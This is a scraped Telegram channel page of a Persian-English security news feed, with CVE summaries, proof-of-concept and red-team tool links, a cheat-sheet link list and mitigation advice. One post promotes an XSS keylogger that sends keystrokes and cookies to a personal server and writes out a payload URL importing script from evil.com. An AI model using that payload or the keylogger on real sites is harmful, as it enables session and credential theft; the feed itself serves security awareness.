iDeFense
5.05K subscribers
119 photos
31 videos
40 files
297 links
🔶 اخبار امنیت سایبری
🔴 بررسی و تحلیل آسیب پذیری ها و حفره های امنیتی
🔵 بررسی راه های تشخیص و جلوگیری از نفوذ
🎥 کانال آپارات
⚜️ aparat.com/iDeFense
🎥 کانال یوتیوب
⚜️ youtube.com/@_iDeFense
💾 کانال بکاپ
⚜️ @iDeF3nse
🔱 @iDeFense_Tester
Download Telegram
سلام ؛ میزبان ارائه ها و مطالب و محتوای آموزشی شما در راستای ارتقا سطح سواد امنیتی در آیدیفنس هستیم ؛ برای انتشار مطالب و همچنین برای عضویت در تیم های فعال مجموعه با پشتیبانی در ارتباط باشید
@iDeFense_Tester
🤝4💯31🤷‍♂1
@idefense.gif
96.6 MB
👍2❤‍🔥1
This media is not supported in your browser
VIEW IN TELEGRAM
‼️وقتی تصمیم می گیرید که فقط رویدادهای امنیتی اساسی رو بررسی کنید...😬

#fun
#SOC
#Critical_Alert
#BlueTeam

@iDeFense
😁8👻1🙈1
🚨 CVE-2024-53677-S2-067🚨

💢 CVSS Score: 9.5 (Critical)
Apache Struts versions 2.0.0 <= 2.5.33 & 6.0.0 <= 6.3.0.2

🛟 The issue has been resolved in Apache Struts 6.4.0 and later versions

‼️ CVE-2024-53677 is a critical vulnerability that allows attackers to exploit weaknesses in the file upload mechanism of Apache Struts. By manipulating the file upload parameters, an attacker can achieve the following:

⚠️ Path Traversal: Upload files to arbitrary locations within the server, bypassing security mechanisms.

⚠️ Remote Code Execution (RCE): Execute malicious code by uploading and triggering executable files, such as .jsp scripts or binary payloads.

🔰 According to the Apache Struts advisory, the vulnerability is not backward-compatible with older file upload mechanisms. As such, organizations using the deprecated file upload method must rewrite their actions to adopt the new, secure mechanism introduced in version 6.4.0.

🔬 POC : https://github.com/TAM-K592/CVE-2024-53677-S2-067

#CVE
#Apache
#RCE

@iDeFense
❤‍🔥3🤔3🏆1🗿1
عزیزانی که علاقه مند به تولید محتوای ویدیویی و همچنین علاقه مند به پژوهش هستند جهت عضویت در گروه درخواست بدن
@iDeFense_Tester
7🗿3
iDeFense
عزیزانی که علاقه مند به تولید محتوای ویدیویی و همچنین علاقه مند به پژوهش هستند جهت عضویت در گروه درخواست بدن @iDeFense_Tester
اینبار در شاخه های مختلف(کد نویسی امن ؛ رد تیمینگ ؛ باینری) و مختص اسیب پذیری های وب نیست
🎄6🗿2
😈 [ Eliran Nissan @eliran_nissan ]

I am excited to share with you my latest research - "DCOM Upload & Execute".
An advanced lateral movement technique to upload and execute custom payloads on remote targets.
Forget about PSEXEC and dive in!

Blog:
🔗 https://www.deepinstinct.com/blog/forget-psexec-dcom-upload-execute-backdoor

Code:
🔗 https://github.com/deepinstinct/DCOMUploadExec

[ tweet ]
🔥6
Exploit for Windows Kernel-Mode Driver Elevation of Privilege Flaw (CVE-2024-35250)

This security flaw is due to an untrusted pointer dereference weakness that allows local attackers to gain SYSTEM privileges in low-complexity attacks that don't require user interaction.
👍4
🔖Bug Bounty CheatSheet

🔴XSS

🔘 Github: 🔗Link
🔘 Github: 🔗Link

🔴SQLi

🔘 Github: 🔗Link

🔴SSRF

🔘 Github: 🔗Link
🔘 Github: 🔗Link

🔴CRLF

🔘 Github: 🔗Link
🔘 Github: 🔗Link

🔴CSV-Injection

🔘 Github: 🔗Link
🔘 Github: 🔗Link

🔴Command Injection

🔘 Github: 🔗Link

🔴Directory Traversal

🔘 Github: 🔗Link

🔴LFI

🔘 Github: 🔗Link
🔘 Github: 🔗Link

🔴XXE

🔘 Github: 🔗Link

🔴Open-Redirect

🔘 Github: 🔗Link

🔴RCE

🔘 Github: 🔗Link

🔴Crypto

🔘 Github: 🔗Link

🔴Template Injection

🔘 Github: 🔗Link
🔘 Github: 🔗Link

🔴XSLT

🔘 Github: 🔗Link

🔴Content Injection

🔘 Github: 🔗Link

🔴LDAP Injection

🔘 Github: 🔗Link

🔴NoSQL Injection

🔘 Github: 🔗Link

🔴CSRF Injection

🔘 Github: 🔗Link

🔴GraphQL Injection

🔘 Github: 🔗Link

🔴IDOR

🔘 Github: 🔗Link

🔴ISCM

🔘 Github: 🔗Link

🔴LaTex Injection

🔘 Github: 🔗Link

🔴OAuth

🔘 Github: 🔗Link

🔴XPATH Injection

🔘 Github: 🔗Link

🔴Bypass Upload Tricky

🔘 Github: 🔗Link

#pentestin #bugbounty #Tools

@iDeFense
👍6
AttackRuleMap

🔺 پروژه مپ Atomic Red Team بر روی
🔘 Splunk ESCU ( در حال تکمیل/فعلا ویندوز )
🔘 Sigma Rules

🔗 https://attackrulemap.netlify.app/

#sigma
#Splunk
#ESCU
#BlueTeam
#SOC

@iDeFense
4
This media is not supported in your browser
VIEW IN TELEGRAM
👁‍🗨UPDATED

💢 CVE-2024-49112 : Windows Lightweight Directory Access Protocol - Remote Code Execution (AKA : LDAP Nightmare)

( The RCE vulnerability was assigned as CVE-2024-49112 and was given the CVSS severity score of 9.8 out of 10 )

♨️ cve-2024-49113 : the DOS vulnerability was assigned CVE-2024-49113
Windows 10 Version 1607 (both 32-bit and x64-based) up to 10.0.14393.7606
Windows Server 2012
Windows Server 2016
Windows Server 2019
Windows Server 2022
Windows 11 22H2
Windows Server 2022 23H2
Windows 11 24H2
Windows Server 2025

🚩 POC : https://github.com/SafeBreach-Labs/CVE-2024-49112
♨️ Blog : https://www.safebreach.com/blog/ldapnightmare-safebreach-labs-publishes-first-proof-of-concept-exploit-for-cve-2024-49113/

#RCE
#LDAP
#Active_Directory
#CVE
#DOS

@iDeFense
🔥4👍1
🕳 A Simple JS code to keylogger data and send it to the personal server + svg file to send the (document.cookie)

💣 https://github.com/11whoami99/XSS-keylogger

📝 USES :

The Keylogger in something like XSS Via OpenRedirect in Login Page :
==> ?domain=javascript%3aimport(//evil.com/xss.js)

📚 در یک وب‌سایت آسیب‌پذیر xss، ممکن است پارامتر domain یا مشابه آن به‌صورت مستقیم در redirect استفاده شود:
🔬https://example.com/redirect?domain=https://legit-site.com

مهاجم لینک زیر را می‌سازد:
🔬https://example.com/redirect?domain=javascript:import(//evil.com/xss.js)

#XSS
#Open_Redirect
#keylogger
#web

@iDeFense
👍51
This media is not supported in your browser
VIEW IN TELEGRAM
🔬 پروژه NetAlertX ابزاری برای مانیتورینگ و مدیریت شبکه‌های WiFi و LAN است که قابلیت‌های متعددی را برای نظارت، شناسایی تغییرات، و ایجاد هشدارها ارائه می‌دهد. این ابزار برای کسانی که می‌خواهند شبکه خود را از نظر امنیتی و عملکردی رصد کنند مفید است

🔍 https://github.com/jokob-sk/NetAlertX

🔷 بررسی دستگاه‌های متصل به شبکه (مانند کامپیوترها، موبایل‌ها، دوربین‌ها و غیره)
🔷 شناسایی تغییرات در پورت‌ها یا اتصال دستگاه‌های جدید
🔷 امکان برنامه‌ریزی برای اسکن دوره‌ای شبکه به منظور شناسایی دستگاه‌های متصل
🔷 تغییرات در پورت‌ها
🔷 اضافه شدن دستگاه‌های ناشناس
🔷 سیستم هشدار (Alert) و ...

#Network
#tools
#wifi

@iDeFense
👍4👏1
〽️ پروژه LitterBox به‌طور خاص برای توسعه و آزمایش تکنیک‌های اجتناب از شناسایی و تحلیل رفتار فایل‌ها یا فرآیندها طراحی شده است. هدف اصلی این پلتفرم کمک به متخصصین امنیتی است تا پیلود ها (Payloads) و ابزارهای خود را قبل از اجرای واقعی آزمایش و بهینه کنند
📦 https://github.com/BlackSnufkin/LitterBox

♾️ توسعه‌دهندگان و متخصصان امنیتی میتوانند از این ابزار به‌عنوان یک محیط شبیه‌سازی (Sandbox) جهت

🔺 روش‌های گریز از شناسایی (Evasion Techniques)
🔺 امضاهای شناسایی (Detection Signatures) را ارزیابی کنند
🔺 رفتار بدافزارها را بدون تأثیر بر سیستم‌های واقعی بررسی و تحلیل کنند

قابلیت تحلیل ایستا (Static Analysis) و تحلیل پویا (Dynamic Analysis)

🔘 شناسایی فایل با الگوریتم‌های هش (MD5، SHA256)
🔘 محاسبه آنتروپی شانن برای تشخیص رمزگذاری‌ها
🔘 تحلیل نوع فایل و شناسایی MIME
🔘 تشخیص نوع فایل PE
🔘 شناسایی معماری ماشین (x86، x64)
🔘 تحلیل تاریخ کامپایل
🔘 طبقه‌بندی Subsystem
🔘 تشخیص Entry Point
🔘 نقشه‌برداری وابستگی DLLهای وارد شده (Import DLL).
📑 تحلیل اسناد آفیس
🔘 تشخیص و استخراج ماکروها
🔘 تحلیل کد VBA و شناسایی محتوای مخفی

✔️ پایش رفتار با اجرا مستقیم فایل‌ها و تحلیل
✔️ بازرسی مناطق حافظه
✔️ تشخیص تزریق فرآیند (Process Hollowing)
✔️ تحلیل تکنیک‌های تزریق (Injection Techniques)
✔️ نظارت بر Sleep Patterns

#RedTeam
#Sandboxing
#StaticAnalysis
#PayloadTesting
#DynamicAnalysis
#MalwareAnalysis
#ThreatSimulation
#MalwareDevelopment
#AdvancedThreatAnalysis

@iDeFense
👍10🙏1
iDeFense
👁‍🗨UPDATED 💢 CVE-2024-49112 : Windows Lightweight Directory Access Protocol - Remote Code Execution (AKA : LDAP Nightmare) ( The RCE vulnerability was assigned as CVE-2024-49112 and was given the CVSS severity score of 9.8 out of 10 ) ♨️ cve-2024-49113…
🛟 To mitigate the risks associated with CVE-2024-49112, organizations should implement several strategies.

🔰 First, deploy the Microsoft patch for CVE-2024-49112 as soon as possible.

🔰 Second, implement network monitoring to detect suspicious CLDAP referral responses, DsrGetDcNameEx2 calls, and DNS SRV queries.

🔰 Third, enforce access controls by restricting network access to LDAP services and ensuring only trusted devices can communicate with Domain Controllers.

@iDeFense
🙏4
🌐 پروژه NjForward یک ابزار رایگان و متن‌باز برای پورت فورواردینگ و ایجاد VPN خصوصی در ویندوز، که امکان ایجاد تونل‌های TCP را برای اهداف مختلف (شامل تست‌های امنیتی و نیازهای تخصصی شبکه) فراهم می‌کند...
جایگزینی بهینه و قابل‌اعتمادتر نسبت به RDP

🕸 https://github.com/ac3ss0r/NjForward/

#PortForwarding
#RedTeam
#tools
#TCPtunneling

@iDeFense
👍11
🚩 استفاده از Cloudflared برای ایجاد تونل‌های امن و حفظ پایداری در RedTeaming
👁‍🗨 https://www.youtube.com/watch?v=JC1hIppKLhI

🚩 ابزار تخصصی NetExec (نام جدید پروژه اصلی CrackMapExec ) برای ارزیابی امنیت شبکه و خودکارسازی تست‌های نفوذ
👁‍🗨 https://www.netexec.wiki/
📝 https://github.com/Pennyw0rth/NetExec

#PenetrationTesting
#RedTeam
#tools
#BypassDefense

@iDeFense
8👍1
This media is not supported in your browser
VIEW IN TELEGRAM
Common pentests VS Real APT Attacks 😬

#fun
#APT
#PenetrationTesting

@iDeFense
🤣15😁3👍2👌1